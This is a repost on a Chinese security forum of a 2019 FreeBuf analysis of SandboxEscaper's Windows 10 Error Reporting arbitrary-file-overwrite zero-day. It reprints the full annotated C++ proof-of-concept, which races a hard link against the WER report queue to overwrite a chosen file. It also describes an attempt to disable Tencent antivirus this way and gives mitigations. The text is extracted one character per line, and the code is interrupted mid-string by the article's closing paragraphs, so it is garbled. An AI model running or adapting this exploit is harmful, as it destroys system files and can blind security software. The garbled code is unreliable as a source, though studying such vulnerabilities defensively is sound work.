论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[13643] 2019-01-12_Windows0day任意文件覆盖漏洞分析与验证
文档创建者:
s7ckTeam
浏览次数:
17
最后更新:
2025-01-18
漏洞
17 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-01-12_Windows0day任意文件覆盖漏洞分析与验证
W
i
n
d
o
w
s
0
d
a
y
任
意
文
件
覆
盖
漏
洞
分
析
与
验
证
m
a
r
k
y
u
F
r
e
e
B
u
f
2
0
1
9
-
0
1
-
1
2
*
本
文
原
创
作
者
:
本
文
原
创
作
者
:
m
a
r
k
y
u
,
本
文
属
于
,
本
文
属
于
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
漏
洞
名
称
漏
洞
名
称
w
i
n
d
o
w
s
任
意
文
件
覆
盖
。
漏
洞
介
绍
漏
洞
介
绍
安
全
研
究
员
S
a
n
d
b
o
x
E
s
c
a
p
e
r
披
露
W
i
n
d
o
w
s
操
作
系
统
中
第
四
个
0
-
d
a
y
漏
洞
的
漏
洞
利
用
代
码
,
利
用
该
漏
洞
可
以
覆
盖
任
意
W
i
n
d
o
w
s
1
0
文
件
,
包
括
通
常
无
法
访
问
的
基
本
文
件
,
例
如
S
a
n
d
b
o
x
E
s
c
a
p
e
r
在
P
O
C
中
给
出
的
p
c
i
.
s
y
s
文
件
,
直
接
造
成
系
统
拒
绝
服
务
,
当
然
可
以
用
此
方
法
来
关
闭
第
三
方
杀
软
,
原
文
如
下
:
其
漏
洞
发
生
模
块
为
W
E
R
(
W
i
n
d
o
w
s
e
r
r
o
r
r
e
p
o
r
t
)
,
W
E
R
是
一
个
灵
活
的
基
于
事
件
的
反
馈
基
础
架
构
,
用
户
收
集
硬
件
和
软
件
发
生
问
题
时
进
行
异
常
回
收
,
然
后
发
送
给
M
i
c
r
o
s
o
f
t
,
并
给
用
户
提
示
合
适
的
异
常
解
决
方
法
。
当
发
生
异
常
时
,
首
先
需
要
使
用
一
系
列
参
数
描
述
该
异
常
,
例
如
应
用
名
字
、
应
用
版
本
、
模
块
名
字
、
模
块
版
本
、
错
误
代
码
等
,
然
后
根
据
这
个
异
常
描
述
,
W
E
R
模
块
便
通
常
查
询
W
E
R
服
务
器
给
用
户
返
回
一
个
异
常
修
复
方
法
,
假
如
W
E
R
服
务
器
上
存
在
该
描
述
的
异
常
,
则
直
接
返
回
解
决
方
案
然
后
通
过
W
E
R
显
示
给
用
户
,
假
如
W
E
R
服
务
器
上
没
有
改
描
述
的
异
常
,
则
返
回
一
个
状
态
码
,
通
过
W
E
R
显
示
并
询
问
用
户
是
否
将
当
前
错
误
发
送
给
微
软
用
于
以
后
研
究
。
漏
洞
本
质
漏
洞
本
质
T
i
m
e
o
f
C
h
e
c
k
V
e
r
s
u
s
T
i
m
e
o
f
U
s
e
(
T
O
C
T
O
U
)
,
原
理
参
考
h
t
t
p
s
:
/
/
w
w
w
.
f
r
e
e
b
u
f
.
c
o
m
/
v
u
l
s
/
1
9
2
8
7
6
.
h
t
m
l
。
漏
洞
利
用
基
础
环
境
漏
洞
利
用
基
础
环
境
原
文
中
描
述
该
漏
洞
成
功
利
用
限
制
较
多
,
最
少
要
满
足
以
下
三
个
要
求
,
但
经
过
测
试
,
其
必
须
连
接
网
络
要
求
可
以
并
不
需
要
,
实
际
限
制
条
件
只
有
下
面
两
个
:
1
.
系
统
版
本
必
须
为
w
i
n
d
o
w
s
1
0
(
其
他
版
本
w
i
n
7
、
w
i
n
2
0
0
8
、
w
i
n
2
0
1
2
经
测
试
均
无
法
复
现
利
用
)
,
2
.
非
单
个
C
P
U
(
单
C
P
U
多
内
核
也
是
不
满
足
条
件
的
)
再
没
有
网
络
连
接
的
时
候
,
在
w
i
n
1
0
上
是
可
以
成
功
复
现
的
,
只
是
会
在
C
:
P
r
o
g
r
a
m
D
a
t
a
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
W
E
R
R
e
p
o
r
t
Q
u
e
u
e
路
径
下
留
下
了
1
_
1
_
1
_
1
_
1
R
e
p
o
r
t
.
w
e
r
文
件
,
即
表
示
该
文
文
件
未
成
功
发
送
给
w
e
r
服
务
器
:
P
O
C
验
证
与
利
用
验
证
与
利
用
1
.
下
载
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
S
a
n
d
b
o
x
E
s
c
a
p
e
r
/
r
a
n
d
o
m
r
e
p
o
/
b
l
o
b
/
m
a
s
t
e
r
/
a
n
g
r
y
p
o
l
a
r
b
e
a
r
b
u
g
.
r
a
r
P
O
C
文
件
。
2
.
桌
面
新
建
t
e
s
t
.
t
x
t
,
随
意
输
入
内
容
:
3
.
确
保
R
e
p
o
r
t
.
w
e
r
和
A
n
g
r
y
P
o
l
a
r
B
e
a
r
B
u
g
.
e
x
e
在
同
一
目
录
,
运
行
P
O
C
文
件
。
4
.
被
覆
盖
后
的
t
e
s
t
.
t
x
t
文
件
如
下
:
P
O
C
原
理
分
析
原
理
分
析
任
意
文
件
覆
盖
利
用
成
功
主
要
在
于
主
程
序
中
r
u
n
m
e
(
自
己
创
建
的
线
程
,
在
该
线
程
中
使
用
硬
链
接
方
式
覆
盖
目
标
文
件
)
与
s
y
s
t
e
m
(
使
用
计
划
任
务
给
w
e
r
服
务
器
发
送
异
常
报
告
)
这
两
个
线
程
函
数
存
在
时
间
竞
争
,
关
于
具
体
实
现
过
程
可
参
考
下
面
源
码
注
释
:
#
i
n
c
l
u
d
e
<
i
o
s
t
r
e
a
m
>
#
i
n
c
l
u
d
e
"
s
t
d
a
f
x
.
h
"
#
i
n
c
l
u
d
e
<
s
t
d
i
o
.
h
>
#
i
n
c
l
u
d
e
<
t
c
h
a
r
.
h
>
#
i
n
c
l
u
d
e
<
W
i
n
d
o
w
s
.
h
>
#
i
n
c
l
u
d
e
<
s
t
r
s
a
f
e
.
h
>
c
o
n
s
t
c
h
a
r
*
t
a
r
g
e
t
f
i
l
e
;
/
/
定
义
一
个
指
向
需
要
被
覆
盖
的
文
件
的
指
针
b
o
o
l
C
r
e
a
t
e
N
a
t
i
v
e
H
a
r
d
l
i
n
k
(
L
P
C
W
S
T
R
l
i
n
k
n
a
m
e
,
L
P
C
W
S
T
R
t
a
r
g
e
t
n
a
m
e
)
;
/
/
C
r
e
a
t
e
N
a
t
i
v
e
H
a
r
d
l
i
n
k
声
明
,
用
于
创
建
一
个
硬
链
接
s
t
d
:
:
w
s
t
r
i
n
g
s
2
w
s
(
c
o
n
s
t
s
t
d
:
:
s
t
r
i
n
g
&
s
t
r
)
/
/
将
多
字
节
编
码
转
换
成
宽
字
节
编
码
{
i
n
t
s
i
z
e
_
n
e
e
d
e
d
=
M
u
l
t
i
B
y
t
e
T
o
W
i
d
e
C
h
a
r
(
C
P
_
U
T
F
8
,
0
,
&
s
t
r
[
0
]
,
(
i
n
t
)
s
t
r
.
s
i
z
e
(
)
,
N
U
L
L
,
0
)
;
/
/
获
取
需
要
的
缓
冲
区
大
小
,
类
型
为
i
n
t
型
s
t
d
:
:
w
s
t
r
i
n
g
w
s
t
r
T
o
(
s
i
z
e
_
n
e
e
d
e
d
,
0
)
;
/
/
申
请
空
间
时
,
将
缓
冲
区
大
小
按
字
符
计
算
M
u
l
t
i
B
y
t
e
T
o
W
i
d
e
C
h
a
r
(
C
P
_
U
T
F
8
,
0
,
&
s
t
r
[
0
]
,
(
i
n
t
)
s
t
r
.
s
i
z
e
(
)
,
&
w
s
t
r
T
o
[
0
]
,
s
i
z
e
_
n
e
e
d
e
d
)
;
r
e
t
u
r
n
w
s
t
r
T
o
;
}
D
W
O
R
D
W
I
N
A
P
I
M
y
T
h
r
e
a
d
F
u
n
c
t
i
o
n
(
L
P
V
O
I
D
l
p
P
a
r
a
m
)
/
/
定
义
自
己
的
线
程
函
数
{
L
P
C
W
S
T
R
f
i
l
e
n
a
m
e
1
;
/
/
L
P
C
W
S
T
R
指
向
u
n
i
c
o
d
e
编
码
字
符
串
的
3
2
位
指
针
L
P
C
W
S
T
R
r
o
o
t
=
L
"
C
:
P
r
o
g
r
a
m
D
a
t
a
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
W
E
R
T
e
m
p
"
;
H
A
N
D
L
E
h
D
i
r
=
C
r
e
a
t
e
F
i
l
e
(
L
"
C
:
P
r
o
g
r
a
m
D
a
t
a
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
W
E
R
T
e
m
p
"
,
F
I
L
E
_
L
I
S
T
_
D
I
R
E
C
T
O
R
Y
,
F
I
L
E
_
S
H
A
R
E
_
W
R
I
T
E
|
F
I
L
E
_
S
H
A
R
E
_
R
E
A
D
|
F
I
L
E
_
S
H
A
R
E
_
D
E
L
E
T
E
,
N
U
L
L
,
O
P
E
N
_
E
X
I
S
T
I
N
G
,
F
I
L
E
_
F
L
A
G
_
B
A
C
K
U
P
_
S
E
M
A
N
T
I
C
S
,
N
U
L
L
)
;
F
I
L
E
_
N
O
T
I
F
Y
_
I
N
F
O
R
M
A
T
I
O
N
s
t
r
F
i
l
e
N
o
t
i
f
y
I
n
f
o
[
1
0
2
4
]
;
/
/
F
I
L
E
_
N
O
T
I
F
Y
_
I
N
F
O
R
M
A
T
I
O
N
定
义
一
个
文
件
通
知
结
构
体
D
W
O
R
D
d
w
B
y
t
e
s
R
e
t
u
r
n
e
d
=
0
;
s
t
d
:
:
w
s
t
r
i
n
g
e
x
t
e
n
s
i
o
n
=
L
"
.
x
m
l
"
;
s
t
d
:
:
s
t
r
i
n
g
t
a
r
g
e
t
f
(
t
a
r
g
e
t
f
i
l
e
)
;
s
t
d
:
:
w
s
t
r
i
n
g
t
a
r
g
e
t
f
w
=
s
2
w
s
(
t
a
r
g
e
t
f
)
;
b
o
o
l
b
l
a
h
=
f
a
l
s
e
;
c
o
n
s
t
w
c
h
a
r
_
t
*
t
a
r
g
e
t
f
w
w
=
t
a
r
g
e
t
f
w
.
c
_
s
t
r
(
)
;
/
/
t
a
r
g
e
t
f
w
w
为
最
终
转
换
后
的
指
向
需
要
被
覆
盖
的
文
件
的
指
针
w
h
i
l
e
(
T
R
U
E
)
{
R
e
a
d
D
i
r
e
c
t
o
r
y
C
h
a
n
g
e
s
W
(
h
D
i
r
,
(
L
P
V
O
I
D
)
&
s
t
r
F
i
l
e
N
o
t
i
f
y
I
n
f
o
,
s
i
z
e
o
f
(
s
t
r
F
i
l
e
N
o
t
i
f
y
I
n
f
o
)
,
T
R
U
E
,
F
I
L
E
_
N
O
T
I
F
Y
_
C
H
A
N
G
E
_
F
I
L
E
_
N
A
M
E
,
&
d
w
B
y
t
e
s
R
e
t
u
r
n
e
d
,
N
U
L
L
,
N
U
L
L
)
;
/
/
监
控
到
h
D
i
r
指
向
的
目
录
下
是
否
有
文
件
发
生
改
变
f
i
l
e
n
a
m
e
1
=
s
t
r
F
i
l
e
N
o
t
i
f
y
I
n
f
o
[
0
]
.
F
i
l
e
N
a
m
e
;
/
/
获
取
变
化
的
文
件
名
s
t
d
:
:
w
s
t
r
i
n
g
d
f
=
s
t
d
:
:
w
s
t
r
i
n
g
(
r
o
o
t
)
+
f
i
l
e
n
a
m
e
1
;
/
/
构
造
变
化
的
文
件
的
绝
对
路
径
s
t
d
:
:
w
s
t
r
i
n
g
:
:
s
i
z
e
_
t
y
p
e
f
o
u
n
d
=
d
f
.
f
i
n
d
(
e
x
t
e
n
s
i
o
n
)
;
/
/
判
断
该
文
件
后
缀
是
否
为
x
m
l
i
f
(
f
o
u
n
d
!
=
s
t
d
:
:
w
s
t
r
i
n
g
:
:
n
p
o
s
)
/
/
匹
配
到
了
后
缀
为
x
m
l
的
文
件
{
L
P
C
W
S
T
R
d
f
c
=
d
f
.
c
_
s
t
r
(
)
;
/
/
指
向
该
变
化
文
件
的
绝
对
路
径
d
o
{
b
l
a
h
=
C
r
e
a
t
e
N
a
t
i
v
e
H
a
r
d
l
i
n
k
(
d
f
c
,
t
a
r
g
e
t
f
w
w
)
;
/
/
创
建
一
个
硬
链
接
,
当
d
f
c
文
件
变
化
时
,
t
a
r
g
e
t
f
w
w
文
件
(
需
要
被
覆
盖
的
文
件
)
也
会
跟
着
变
化
}
w
h
i
l
e
(
b
l
a
h
=
=
f
a
l
s
e
)
;
/
/
成
功
返
回
1
,
跳
出
创
建
线
程
的
循
环
r
e
t
u
r
n
0
;
}
}
r
e
t
u
r
n
0
;
}
/
/
那
么
我
们
现
在
只
需
要
创
造
出
一
个
异
常
,
并
保
存
到
C
:
P
r
o
g
r
a
m
D
a
t
a
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
W
E
R
T
e
m
p
目
录
下
,
调
用
该
函
数
时
便
会
成
功
执
行
,
即
覆
盖
我
们
的
目
标
文
件
v
o
i
d
r
u
n
m
e
(
)
{
/
/
创
建
一
个
线
程
H
A
N
D
L
E
m
T
h
r
e
a
d
=
C
r
e
a
t
e
T
h
r
e
a
d
(
N
U
L
L
,
0
,
M
y
T
h
r
e
a
d
F
u
n
c
t
i
o
n
,
N
U
L
L
,
0
,
N
U
L
L
)
;
/
/
线
程
安
全
属
性
、
堆
栈
大
小
、
线
程
函
数
、
线
程
参
数
、
线
程
创
建
属
性
、
线
程
I
D
}
i
n
t
m
a
i
n
(
i
n
t
a
r
g
c
,
c
o
n
s
t
c
h
a
r
*
a
r
g
v
[
]
)
{
i
f
(
a
r
g
c
<
2
)
{
/
/
判
断
输
入
的
参
数
格
式
是
否
正
确
s
t
d
:
:
c
o
u
t
<
<
s
t
d
:
:
e
n
d
l
<
<
"
P
l
e
a
s
e
i
n
c
l
u
d
e
a
f
i
l
e
p
a
t
h
a
s
f
i
r
s
t
p
a
r
a
m
e
t
e
r
"
;
r
e
t
u
r
n
0
;
}
D
W
O
R
D
d
w
F
i
l
e
S
i
z
e
=
0
;
D
W
O
R
D
d
w
F
i
l
e
S
i
z
e
2
=
0
;
t
a
r
g
e
t
f
i
l
e
=
a
r
g
v
[
1
]
;
/
/
指
向
获
取
需
要
被
覆
盖
的
目
标
文
件
绝
对
路
径
H
A
N
D
L
E
h
F
i
l
e
=
C
r
e
a
t
e
F
i
l
e
A
(
a
r
g
v
[
1
]
,
G
E
N
E
R
I
C
_
R
E
A
D
,
0
,
N
U
L
L
,
O
P
E
N
_
E
X
I
S
T
I
N
G
,
F
I
L
E
_
A
T
T
R
I
B
U
T
E
_
N
O
R
M
A
L
,
N
U
L
L
)
;
/
/
打
开
需
要
被
覆
盖
的
目
标
文
件
i
f
(
h
F
i
l
e
=
=
I
N
V
A
L
I
D
_
H
A
N
D
L
E
_
V
A
L
U
E
)
/
/
打
开
需
要
被
覆
盖
的
目
标
文
件
句
柄
时
发
生
异
常
了
{
s
t
d
:
:
c
o
u
t
<
<
s
t
d
:
:
e
n
d
l
<
<
"
I
d
o
n
o
t
h
a
v
e
r
e
a
d
p
e
r
m
i
s
s
i
o
n
s
f
o
r
t
h
i
s
f
i
l
e
o
r
f
i
l
e
d
o
e
s
n
o
t
e
x
i
s
t
"
;
r
e
t
u
r
n
0
;
}
d
w
F
i
l
e
S
i
z
e
=
G
e
t
F
i
l
e
S
i
z
e
(
h
F
i
l
e
,
N
U
L
L
)
;
/
/
先
获
取
需
要
被
覆
盖
的
目
标
文
件
的
大
小
,
用
于
下
面
判
断
该
文
件
是
否
已
经
被
覆
盖
d
w
F
i
l
e
S
i
z
e
2
=
d
w
F
i
l
e
S
i
z
e
;
C
l
o
s
e
H
a
n
d
l
e
(
h
F
i
l
e
)
;
/
/
关
闭
目
标
文
件
句
柄
s
t
d
:
:
c
o
u
t
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
针
对
于
作
者
原
文
中
提
到
利
用
该
漏
洞
可
能
绕
过
第
三
方
杀
软
,
我
做
了
如
下
测
试
,
测
试
对
象
为
腾
讯
的
电
脑
管
家
,
尝
试
覆
盖
电
脑
管
家
运
行
时
的
关
键
文
件
以
达
到
关
闭
杀
软
的
效
果
。
首
先
打
开
任
务
管
理
器
找
到
电
脑
关
键
的
核
心
服
务
的
Q
Q
P
C
M
g
r
R
T
P
S
e
r
v
i
c
e
,
然
后
再
通
过
s
e
r
v
i
c
e
s
.
m
s
c
找
到
该
服
务
,
右
击
属
性
找
到
该
服
务
程
序
的
路
径
,
”
C
:
P
r
o
g
r
a
m
F
i
l
e
s
(
x
8
6
)
T
e
n
c
e
n
t
Q
Q
P
C
M
g
r
1
3
.
0
.
1
9
8
3
8
.
2
3
6
Q
Q
P
C
R
T
P
.
e
x
e
”
,
那
么
我
们
把
该
文
件
覆
盖
掉
是
不
是
就
可
以
关
闭
电
脑
管
家
,
操
作
如
下
:
尝
试
覆
盖
Q
Q
P
C
R
T
P
.
e
x
e
文
件
,
提
示
I
d
o
n
o
t
h
a
v
e
r
e
a
d
p
e
r
m
i
s
s
i
o
n
s
f
o
r
t
h
i
s
f
i
l
e
o
r
f
i
l
e
d
o
e
s
n
o
t
e
x
i
s
t
,
发
现
我
们
并
不
能
覆
盖
该
文
件
,
导
致
该
错
误
是
由
于
,
P
O
C
中
是
直
接
通
过
C
r
e
a
t
e
F
i
l
e
的
方
式
来
获
取
目
标
文
件
句
柄
的
,
由
于
该
文
件
处
于
正
在
运
行
状
态
,
导
致
获
取
句
柄
失
败
,
即
关
闭
杀
软
失
败
,
无
法
利
用
该
漏
洞
去
覆
盖
正
在
运
行
的
程
序
。
漏
洞
修
复
漏
洞
修
复
1
.
经
验
证
该
漏
洞
只
适
用
于
w
i
n
1
0
系
统
版
本
,
截
至
目
前
,
微
软
官
方
并
未
发
布
补
丁
,
由
于
该
漏
洞
环
境
为
本
地
,
不
可
以
远
程
触
发
,
为
防
止
攻
击
者
对
该
漏
洞
进
行
利
用
,
用
户
不
要
下
载
与
运
行
来
源
不
明
的
软
件
。
2
.
通
过
s
e
r
v
i
c
e
s
.
m
s
c
临
时
关
闭
W
i
n
d
o
w
s
E
r
r
o
r
R
e
p
o
r
t
i
n
g
S
e
r
v
i
c
e
。
参
考
参
考
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
S
a
n
d
b
o
x
E
s
c
a
p
e
r
/
r
a
n
d
o
m
r
e
p
o
/
b
l
o
b
/
m
a
s
t
e
r
/
a
n
g
r
y
p
o
l
a
r
b
e
a
r
b
u
g
.
r
a
r
h
t
t
p
s
:
/
/
d
o
c
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
e
n
-
u
s
/
w
i
n
d
o
w
s
/
d
e
s
k
t
o
p
/
w
e
r
/
a
b
o
u
t
-
w
e
r
h
t
t
p
s
:
/
/
d
o
c
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
z
h
-
c
n
/
w
i
n
d
o
w
s
/
d
e
s
k
t
o
p
/
F
i
l
e
I
O
/
h
a
r
d
-
l
i
n
k
s
-
a
n
d
-
j
u
n
c
t
i
o
n
s
*
本
文
原
创
作
者
:
本
文
原
创
作
者
:
m
a
r
k
y
u
,
本
文
属
于
,
本
文
属
于
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
<
<
"
/
/
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
抖
抖
抖
抖
抖
Ё
Ё
Ё
Ё
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
抖
抖
抖
?
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
1
Ё
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
抖
抖
1
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
Ё
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
抖
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
Ё
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
锭
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
Ф
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
Ф
抖
抖
抖
抖
/
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
`
`
`
`
`
`
`
`
`
`
B
I
P
O
L
A
R
B
E
A
R
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
Ф
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
?
`
1
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
`
1
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
锭
抖
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
Ф
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
禶
Ё
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
Ф
抖
/
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
1
`
`
1
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
1
1
Ё
抖
抖
抖
Ё
Ф
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
`
`
`
`
1
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
1
Ё
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
锭
`
`
`
`
`
`
`
`
`
`
`
`
`
1
1
`
`
`
`
`
`
`
`
`
Ё
`
`
1
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
/
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
禶
`
`
`
`
`
1
抖
`
`
`
`
`
`
`
抖
抖
1
`
`
`
`
`
?
`
`
`
`
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
/
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
禶
`
`
`
`
Ф
抖
?
`
`
`
`
`
抖
抖
`
`
`
抖
1
`
`
`
`
1
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
`
`
`
Ф
抖
抖
禶
`
`
`
1
抖
抖
`
`
`
抖
禶
`
`
`
`
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
禶
`
`
`
Ф
抖
抖
禶
`
`
`
1
抖
抖
`
`
`
抖
抖
`
`
`
`
1
抖
抖
抖
抖
抖
抖
抖
抖
抖
/
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
1
1
1
`
1
1
抖
抖
1
`
`
`
`
`
`
1
抖
`
`
`
1
Ф
?
`
`
`
`
1
1
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
抖
?
/
"
<
<
s
t
d
:
:
e
n
d
l
<
<
"
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
/
"
<
<
s
t
d
:
:
e
n
d
l
;
s
t
d
:
:
c
o
u
t
<
<
s
t
d
:
:
e
n
d
l
<
<
"
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
B
I
P
O
L
A
R
B
E
A
R
S
A
L
U
T
E
S
Y
O
U
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
"
<
<
s
t
d
:
:
e
n
d
l
;
S
l
e
e
p
(
2
0
0
0
)
;
d
o
{
C
r
e
a
t
e
D
i
r
e
c
t
o
r
y
W
(
L
"
c
:
p
r
o
g
r
a
m
d
a
t
a
m
i
c
r
o
s
o
f
t
w
i
n
d
o
w
s
w
e
r
r
e
p
o
r
t
q
u
e
u
e
1
_
1
_
1
_
1
_
1
"
,
N
U
L
L
)
;
/
/
再
c
:
p
r
o
g
r
a
m
d
a
t
a
m
i
c
r
o
s
o
f
t
w
i
n
d
o
w
s
w
e
r
r
e
p
o
r
t
q
u
e
u
e
下
创
建
1
_
1
_
1
_
1
_
1
子
目
录
C
o
p
y
F
i
l
e
W
(
L
"
R
e
p
o
r
t
.
w
e
r
"
,
L
"
c
:
p
r
o
g
r
a
m
d
a
t
a
m
i
c
r
o
s
o
f
t
w
i
n
d
o
w
s
w
e
r
r
e
p
o
r
t
q
u
e
u
e
1
_
1
_
1
_
1
_
1
R
e
p
o
r
t
.
w
e
r
"
,
t
r
u
e
)
;
/
/
复
制
当
前
目
录
下
R
e
p
o
r
t
.
w
e
r
文
件
到
上
面
创
建
子
目
录
中
,
即
将
该
R
e
p
o
r
t
.
w
e
r
异
常
包
加
入
异
常
报
告
队
列
r
u
n
m
e
(
)
;
/
/
在
发
送
异
常
报
告
时
,
会
在
C
:
P
r
o
g
r
a
m
D
a
t
a
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
W
E
R
T
e
m
p
,
目
录
下
产
出
一
个
临
时
文
件
R
e
p
o
r
t
.
w
e
r
,
此
时
便
会
被
我
们
自
己
创
建
的
线
程
捕
获
,
在
线
程
中
替
换
了
目
标
文
件
s
y
s
t
e
m
(
"
S
C
H
T
A
S
K
S
/
R
u
n
/
T
n
"
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
W
i
n
d
o
w
s
E
r
r
o
r
R
e
p
o
r
t
i
n
g
Q
u
e
u
e
R
e
p
o
r
t
i
n
g
"
"
)
;
/
/
通
过
s
y
s
t
e
m
函
数
调
用
计
划
任
务
运
行
W
E
R
,
模
拟
系
统
发
送
给
w
e
r
服
务
器
发
送
异
常
,
故
该
漏
洞
利
用
条
件
之
一
需
要
连
接
网
络
H
A
N
D
L
E
h
F
i
l
e
2
=
C
r
e
a
t
e
F
i
l
e
A
(
a
r
g
v
[
1
]
,
G
E
N
E
R
I
C
_
R
E
A
D
,
0
,
N
U
L
L
,
O
P
E
N
_
E
X
I
S
T
I
N
G
,
F
I
L
E
_
A
T
T
R
I
B
U
T
E
_
N
O
R
M
A
L
,
N
U
L
L
)
;
/
/
重
新
获
取
目
标
文
件
句
柄
i
f
(
h
F
i
l
e
2
!
=
I
N
V
A
L
I
D
_
H
A
N
D
L
E
_
V
A
L
U
E
)
/
/
判
断
当
前
文
件
大
小
与
上
一
次
的
文
件
大
小
是
否
相
等
,
假
如
相
等
便
成
功
替
换
{
d
w
F
i
l
e
S
i
z
e
2
=
G
e
t
F
i
l
e
S
i
z
e
(
h
F
i
l
e
2
,
N
U
L
L
)
;
}
C
l
o
s
e
H
a
n
d
l
e
(
h
F
i
l
e
2
)
;
}
w
h
i
l
e
(
d
w
F
i
l
e
S
i
z
e
=
=
d
w
F
i
l
e
S
i
z
e
2
)
;
s
t
d
:
:
c
o
u
t
<
<
s
t
d
:
:
e
n
d
l
<
<
"
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
D
A
T
A
I
N
F
I
L
E
S
U
C
C
E
S
S
F
U
L
L
Y
D
E
S
T
R
O
Y
E
D
-
P
r
e
s
s
k
e
y
t
o
e
x
i
t
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
"
;
g
e
t
c
h
a
r
(
)
;
/
/
退
出
主
进
程
}
阅
读
